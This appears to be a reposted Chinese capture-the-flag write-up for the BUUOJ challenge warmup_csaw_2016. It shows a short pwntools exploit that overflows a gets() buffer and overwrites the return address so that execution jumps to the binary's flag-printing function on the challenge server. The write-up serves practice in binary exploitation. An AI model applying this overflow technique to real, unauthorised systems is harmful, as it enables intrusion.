首页 > 其他 > 详细

buuoj warmup_csaw_2016

时间:2021-04-07 14:46:04      阅读:22      评论:0      收藏:0      [点我收藏+]

放进IDA,找到gets
技术分享图片
接收0x40位,然后查看字符串,虽然没有bin/sh,但是有能直接用的
技术分享图片
找到所在函数和地址
技术分享图片
exp:

from pwn import *

p=remote(‘node3.buuoj.cn‘,27180)
sys_addr=0x40060D
payload=‘a‘*(0x40+8)+p64(sys_addr)
p.sendline(payload)
p.interactive()

这里有个不太清楚的+8……不知道32和64下各应该在什么情况下加多少orz

buuoj warmup_csaw_2016

原文:https://www.cnblogs.com/diakla/p/14627138.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!